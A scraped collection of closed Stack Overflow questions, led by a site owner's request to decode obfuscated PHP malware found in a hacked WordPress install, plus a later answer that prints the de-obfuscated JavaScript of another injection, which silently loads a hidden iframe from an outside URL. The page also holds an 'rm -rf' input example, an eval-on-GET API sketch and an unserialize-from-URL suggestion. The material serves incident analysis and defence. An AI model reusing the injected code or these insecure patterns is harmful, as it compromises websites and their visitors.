Wordpress site hacked: Un obfuscate malicious code [closed] - php
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of the sites I manage got hacked through a wordpress install in the shared environment.
It looks like some maleware has been injected into all the php files on the server. I've managed to delete all references of the code and changed all the passwords. Subsequently ive been getting failed login attemps from an ip in the ukraine...
<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?>
<?php
$vkvmlmaavg = 'zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfs%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6N}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x78x5c%x782fq%x5c%x7825>2q%x5c%x7825<#x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%xMPT7-NBFSUT%x5c%x7860LDPT7-U256]y6g]257]y86]267]y74]275]y7:]<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x78{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x780{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860825-bubE{h%x5c%x7825)sutcc%x7824]25%x5c%x7824-%x5c%x7824-!c%x7825%x5c%x787f!<X>b%x5c%x7825Z334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x78:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%c%x7825>U<#16,47R57,27R66,#%7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)y81]265]y72]254]y76]61]y33]6#]y76]277]y72]265]y39]274]y85]273]yq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7826<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]if((function_exists("%x6f%142%x5f%163%x74%141%x72%164"%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x78c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*1x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x825)euhA)3of>2bd%x5c%x7825!<5h%x5%x5c%x7825%x5c%x782fh%x5c%x7825)n]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x55c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-sf*#npd%x5c%x782f#)rrd%x5c%x78%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x5)!gj!~<ofmy%x5c%x7825,3,j%25>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782frx7824-%x5c%x7824*<!~!ds]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%7x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x}%x5c%x7878;0]=])0#)U!%x5cx5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x76g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]y83]273]y76]277#<%x5c%x7825t2w>#]*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpetj{fpg)%x5c%x7825%x5c%7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopw6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!ufs:~928>>%x5c%x7822:ftmbg39*56A:>c%x7860TW~%x5c%x7824<%x5c%x78ex5c%x787f!>>%x5c%x7822!pd%x5c%x7:55946-tr.984:75983:48984:71TW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%25-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5qmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c37]278]225]241]334]368]32mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<*x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78268]y7f#<!%x5c%x7825tc%x785cq%x5c%x78257%x5c%x782f7###7%xx7860{6~6<tfs%x5c%x7825.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x525zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!7824-%x5c%x7824<%x5c%x7825j,,*!|%x5%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R2ov{h19275j{hnpd19275fub%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfbqov>*ofmy%x5c%x7825)utjm!|!*5!%x525s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6FOJ%x5c%x7860GB)fubfsdXA%x5c%452]88]5]48]32M3]317]445]212]445]fmji%x5c%x7878:<##:>:h%x5c%x724!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]760hA%x5c%x7827pd%x5c%x782%x5c%x7825-#+I#)q%x5c%x7825:vt)fubmgoj{hA!osvufs!~<3,j%x5c%x_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x78605)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0x787f%x5c%x787f%x5c%x787F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x786%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ft4-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=turn chr(ord($n)-1);} #error_reporting(0); preg_replace("%x2f%50%]281Ld]245]K2]285]Ke]525cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x58]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6}.;%x5c%x7860UQPMSVD!-id%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){re25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x74+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>%x5c%x7825!|!*)323zbek!~!<b%x5#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%825:<#64y]552]e7y]#>n%x5c%x7825<#37224Ypp3)%x5c%x7825cB%x5c%x7825igj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%y74]273]y76]252]y85]c%x7825%x5c%x782f#0#%x5c%x782e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,54]y76#<%x5c%x7825tmw!>!#]y84]27525c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x78hmg%x5c%x7825!<12>j%x5c%x782#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3", NULL); }4%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yx785cq%x5c%x7825%x5c%x7827j>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x78608]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}Ux787f;!opjudovg}k~~9{d%x5c%x7825:osv*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6!2p%x5c%x7825!*3>?*2b%x5c%x7825)7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x78=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x786x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP56%152%x66%147%x67%42%x2c%163%x73Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj65,d7R17,67R37,#%x5c%x782fq%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7825x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>76]277]y72]265]y39]271]y83]256]y78]248]y83]256]25}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)x7825!osvufs!*!+A!>!<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%))1%x5c%x782f35.)1%x5c%x782f12]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x78<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5cc%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc%x7825!*9!%x5c%x7827!hmg%x5c%x782yfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!5r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])5c%x782f7^#iubq#%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<43]321]464]284]364]6]2/(.*)/epreg_replacekjfgnktllk';
$acpbcdcqwr = explode(chr((169 - 125)), '1655,54,9690,46,6518,63,6253,65,7910,69,223,49,8581,31,7446,62,6068,59,6431,60,9241,70,1801,68,5545,25,8758,56,1605,50,8661,68,9867,70,85,41,7979,55,4228,45,9814,53,1709,36,806,52,417,28,5389,29,3938,67,2879,51,2355,66,4132,36,9736,21,7559,27,4273,58,1137,70,2795,43,8459,54,768,38,4005,39,8034,63,4168,23,3430,64,1909,54,5334,55,477,53,10029,55,4191,37,3375,55,4401,43,8915,56,6491,27,6844,56,9624,66,3661,32,6000,68,6581,43,858,25,5598,32,4686,47,7049,61,595,46,3791,36,9484,34,2630,27,5870,69,5243,34,272,37,2066,47,7350,28,2113,63,4884,44,1490,56,8814,54,8195,32,7685,32,2956,57,2228,33,7206,29,2551,29,641,41,7235,38,7847,63,7586,44,2838,41,3097,55,1305,59,0,52,1427,63,8227,41,3304,49,5630,35,4044,67,4444,22,6900,30,916,33,8991,61,6784,60,9518,51,9355,64,52,33,354,63,2421,68,7811,36,3597,34,7110,40,5136,23,3895,43,1077,60,9982,47,8971,20,530,65,5780,24,6127,60,5075,61,8729,29,1207,28,188,35,309,45,5804,66,7771,40,3220,30,3250,54,2930,26,8368,40,1869,40,5731,49,4802,47,1392,35,3013,50,8097,62,7273,33,3063,34,7186,20,445,32,4111,21,9311,44,732,36,2657,69,2261,33,5570,28,3152,68,5451,29,6983,36,2294,61,1235,70,5665,66,949,58,4928,53,883,33,9052,47,1963,67,9937,45,5159,38,5197,46,3827,43,2580,50,4849,35,1546,59,6187,66,3353,22,2726,23,1007,70,5480,65,5939,61,7019,30,126,62,7306,44,6340,43,9569,55,9183,58,4584,65,3721,70,9757,57,4466,63,2489,62,2030,36,4733,69,3693,28,7150,36,8513,68,8159,36,682,50,4649,37,6318,22,8612,49,7717,54,1745,56,7378,56,3870,25,9128,55,5418,33,10084,22,3494,66,9099,29,6624,59,5033,42,4981,52,8307,61,8268,39,5277,57,3560,37,4331,70,8408,51,6731,53,4529,55,3631,30,6383,48,9419,65,6930,53,2176,52,6683,48,7508,51,8868,47,1364,28,7630,55,2749,46,7434,12');
$krdnhuyxrk = substr($vkvmlmaavg, (38379 - 28273), (35 - 28));
if (!function_exists('bvbkmkuetp'))
{
function bvbkmkuetp($lkmdhuzumr, $syqugkbwaa)
{
$wkmwfztjxy = NULL;
for ($wpopdgyvwt = 0; $wpopdgyvwt < (sizeof($lkmdhuzumr) / 2); $wpopdgyvwt++)
{
$wkmwfztjxy. = substr($syqugkbwaa, $lkmdhuzumr[($wpopdgyvwt * 2)], $lkmdhuzumr[($wpopdgyvwt * 2) + 1]);
}
return $wkmwfztjxy;
};
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x30\55\x34\71\x38\51\x29\54\x20\142\x76\142\x6b\155\x6b\165\x65\164\x70\50\x24\141\x63\160\x62\143\x64\143\x71\167\x72\54\x24\166\x6b\166\x6d\154\x6d\141\x61\166\x67\51\x29\51\x3b\40\x2f\52\x20\167\x68\156\x75\164\x6c\152\x78\153\x70\40\x2a\57\x20";
$lrykfpczcb = substr($vkvmlmaavg, (55025 - 44912), (61 - 49));
$lrykfpczcb($krdnhuyxrk, $knticqyoeu, NULL);
$lrykfpczcb = $knticqyoeu;
$lrykfpczcb = (376 - 255);
$vkvmlmaavg = $lrykfpczcb - 1;
?>
My question is, what does this code do? I have tried quite a few obfuscation tools but it to no avail. Is anyone able to help decipher this?
This question has been answered in another Stack Exchange site: https://security.stackexchange.com/questions/70579/is-this-a-backdoor
Excerpts from that answer:
This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript
...
It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin
...
The key takeaway from this incident is to backup your data frequently and update your software conscientiously
Answered by https://security.stackexchange.com/users/9312/question-overflow
Related
laravel vue multi language site : String as key [closed]
Closed. This question needs details or clarity. It is not currently accepting answers. Want to improve this question? Add details and clarify the problem by editing this post. Closed 5 years ago. Improve this question I have been searching for an easy no plugin solution. I am using laravel's string as key format for my translation file. I have fr.json file and inside this file I have all the texts and it's translations. It works fine for blade but not being able to use it in my .vue files. Please help me how can I use this fr.json file in all of my .vue file. Thank you.
If you want to get your translation files in Vue, you'd have to import them in your javascript.
First. Set a meta tag in your head eith the current language:
<meta name='locale' content='{{app()->getLocale()}}' />
And then in your javascript for this example resources/assets/js/app.js:
var locale = document.head.querySelector('meta[name="csrf-token"]').content;
var lang = {
locale: require('../../lang/' + locale + '.json')
}
Maybe you can do the same for the default/fallback language. Then a translate function would look like this:
function trans(key, replace) {
var message;
if (lang[locale][key] != undefined) {
message = lang[locale][key];
} else if (lang[defaultLocale][key] != undefined) {
message = lang[defaultLocale][key];
}
if (message) {
// Loop through each item of replace and string replace the message.
return message;
}
return key;
}
Something like this could work I think. Didn't test it and needs some tweaking but I think that this should be the idea when solving this problem.
How can I make a simple api that can connect to mysql? [closed]
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
I need help on how to make an API for PHP. I was trying to make one web server communicate with another webserver through PHP.
I also want it to update MySQL code. I was using $_GET but it was less secure. Here is my code, can you please take a look at it?
<?php
/*
example: website-url-here.com/?command=insert-command-here&password=testing
*/
$command = $_GET["command"];
$password = $_GET["password"];
if ($password == "testing") {
//Was not a good idea, less secure.
//echo eval($command);
//More secure
if ($command == "create-user")
{
//create user command here
}
else if ($command == "delete-user")
{
//delete user command here
}
else
{
die("Command is incorrect");
}
}
echo "Success";
?>
This question is way too open ended to answer in a StackOverflow answer. Try reading up a little on REST, and a lot on PDO, especially in the context of sanitizing user input. Think about what would happen if somebody called your api with [url]?command=rm -rf .&password=testing
Check whether website is using sitemap and robots files [closed]
Closed. This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 7 years ago. Improve this question How do I know whether the website is using robot.txt and sitemap.txt? I have done extracting keyword, description, title; however I am unable to find the way to code to check whther the website is using robot.txt and sitemap.txt. I am doing something like this http://www.seoptimer.com/report/loadster.in/5553240531d12
Use file_get_contents:
$robotsContents = file_get_contents("http://targetdomain.com/robots.txt");
$sitemapContents = file_get_contents("http://targetdomain.com/sitemap.xml");
Check if contents are false, false will mean 404 Not Found, then check if it's not HTML contents (because some sites redirect every URL) with strpos($robotsContents, '<html') === false, if there is no tag, that mean it can be txt ou xml file.
So:
function pathExistsAndIsNotHtml($path) {
$contents = #file_get_contents($path);
return ! empty($contents) && strpos($contents, '<html') === false;
}
if(pathExistsAndIsNotHtml("http://targetdomain.com/robots.txt")) {
echo 'http://targetdomain.com/robots.txt';
} else {
echo 'There is no robots.txt';
}
if(pathExistsAndIsNotHtml("http://targetdomain.com/sitemap.xml")) {
echo 'http://targetdomain.com/sitemap.xml';
} else {
echo 'There is no sitemap.xml';
}
PHP hand variable to another php document [closed]
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 9 years ago.
Improve this question
I'm trying to get a variable which I declared in one php file to another without including the whole first php
while($row = mysql_fetch_assoc($sql)) {
// Urlaubstage ausgeben
if($row['frtutage'] < 1) {
$verbraucht = "0";
} else {
$verbraucht = $row['frtutage'];
}
$resturlaub = $row['miturlaubstage'] + $row['mitutagevorjahr'] - $verbraucht;
$urlaubgesamt = $row['miturlaubstage'] + $row['mitutagevorjahr'];
I need the variable $resturlaub in the second PHP without calculating the variable again.
How do I do this? Or is it even possible?
Thanks.
edit: the first php file is about calculating vacation days and how much I have remaind after taking a few vacation days, in the second file I need the calculation of the remaining days then, so I just want to use the variable again and not calculate it again
You can try somehting like
$var = 'random_query';
$page= 'yourpage.com/?my_var='.serialize($var);
header("Location: $page");
exit;
and in your page you can get the value by
if (isset($_GET['my_var']))
{
$my_var = unserialize($_GET['my_var']);
}
But it would depend on the size of that variable that you need to pass, and what is the purpose of the scripts.
If you don't want to include the whole first php file but only a variable then you should create a third file (called: variables.php or config.php for example). Then include variables.php in both file so the variable will be shared among your scripts
How to find malicous code/malware on a website [closed]
Closed. This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 9 years ago. Improve this question My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize. I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicous code (they referred to it as a code injection). I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing. Any help would be greatly appreciated. EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there. My thoughts are that its either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.
This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.